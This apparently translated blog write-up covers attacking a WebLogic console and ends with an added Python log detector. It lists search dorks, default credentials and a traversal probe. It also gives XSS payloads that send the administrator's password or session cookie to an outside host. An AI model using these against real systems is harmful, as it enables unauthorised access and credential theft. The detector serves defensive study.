Web security practices (10) attack weblogic

Source: Internet
Author: User


This is a small experiment that took me more than two hours. I only examined one website and did not perform a systematic overall security analysis of WebLogic.

Body

I. Methods for finding WebLogic

(1) Use the platform identification method introduced earlier to determine whether the target is a WebLogic Server.

(2) Google Search

Keyword "WebLogic Server inurl:console". A URL that ends in "console" is generally the entry point of the WebLogic Server management console.

If the URL does not take you to the management interface, append /console to the target URL and press Enter; the server redirects automatically to the management logon page.

Guess the path of the management interface, such as login/LoginForm.jsp.

A crawler can also be used to download the website's directory structure, which makes it easy to determine the exact location of the logon page.


II. Analysis

(1) Test default passwords

The default credentials include the following groups:

1. username and password: weblogic

2. username and password: system

3. username and password: portaladmin

4. username and password: guest

If none of these work, you can combine the usernames and passwords, for example the username weblogic with the password system, and vary the combinations flexibly. Of course, you can also create a dictionary file. However, I have not been able to use it for a long time.

(2) Verify URL input

BEA WebLogic has a security vulnerability on the Windows platform that allows attackers to obtain the content listing of the web directory.
For example, I entered /http://www.cnblogs.com/../ in the URL.

Result:

The homepage is displayed. This indicates that the website does not filter URL input.

(3) View the form

This information caught my attention when I checked the client-side source:

The form fields that transmit the username and password are j_username and j_password respectively. I tested them for cross-site scripting.
The j_username and j_password parameters on the BEA WebLogic Console logon page have a cross-site scripting vulnerability. An attacker can make a legitimate web application deliver malicious code to an unsuspecting end user, generally by creating a hyperlink with embedded script. A valid user may click this link because it appears to point to a resource in a trusted domain. If the user clicks it, the attacker-supplied code executes in the user's browser, which may steal the administrator's session cookie.


Statements like the ones given below execute successfully.

Steal administrator password
http://dd/console/login/LoginForm.jsp?j_password="" onBlur="window.open('http://xuanhun/'%2Bdocument.all.j_password.value)"
Session cookie theft
http://dd/console/login/LoginForm.jsp?j_password="" onBlur="window.open('http://xuanhun/'%2Bdocument.cookie)"
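From the defender's side, the three probes described in this article (default-password guessing against the console, "../" traversal in the URL, and attribute injection into j_username/j_password on LoginForm.jsp) all leave recognisable traces in the web server access log. The following detector is an added example, not code from the original article or from WebLogic; the log lines, IP addresses, hosts and the /console/j_security_check login action are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit
# Constructed sample access log (hypothetical IPs and hosts) mimicking the traffic
# the article describes: an XSS probe in j_password, a "../" probe, failed logins.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3120
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /console/login/LoginForm.jsp?j_password=%22%22%20onBlur=%22window.open('http://xuanhun/'%2Bdocument.cookie)%22 HTTP/1.1" 200 3150
10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /http://www.cnblogs.com/../ HTTP/1.1" 200 4096
10.0.0.9 - - [01/Jan/2024:10:02:00 +0000] "POST /console/j_security_check HTTP/1.1" 401 0
10.0.0.9 - - [01/Jan/2024:10:02:01 +0000] "POST /console/j_security_check HTTP/1.1" 401 0
10.0.0.9 - - [01/Jan/2024:10:02:02 +0000] "POST /console/j_security_check HTTP/1.1" 401 0
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
ATTR_INJECT = re.compile(r'["\'].*\bon[a-z]+\s*=', re.IGNORECASE)  # a quote, then an on*= handler
LOGIN_FIELDS = ("j_username", "j_password")

def classify(line):
    """Return alert tags for one log line (empty list if nothing suspicious)."""
    if not (m := LOG_RE.match(line)):
        return []
    tags = []
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path)
    if "../" in path or "..\\" in path:  # section (2): path traversal probe
        tags.append("path-traversal")
    if path.endswith("/console/login/LoginForm.jsp") and parts.query:
        # Login fields belong in a POST body; a quote plus event handler in one is the XSS probe.
        params = parse_qs(parts.query, keep_blank_values=True)
        for field in LOGIN_FIELDS:
            for value in params.get(field, []):
                kind = "xss-attribute-injection" if ATTR_INJECT.search(value) else "login-field-in-url"
                tags.append(f"{kind}:{field}")
    return tags

def failed_console_logins(lines, threshold=3):
    """Source IPs with at least `threshold` failed console POSTs (section (1): password guessing)."""
    counts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and m.group("method") == "POST" and m.group("target").startswith("/console/") and m.group("status") in ("401", "403"):
            counts[m.group("ip")] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}

def scan(log_text):
    # Returns ({line_number: tags}, {ip: failed_login_count}) for a whole log.
    lines = log_text.splitlines()
    alerts = {i: t for i, l in enumerate(lines, 1) if (t := classify(l))}
    return alerts, failed_console_logins(lines)
```

Run against a real access log, the same rules pick out console reconnaissance before any successful login, and the per-IP failure count is the natural trigger for lockout or alerting.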
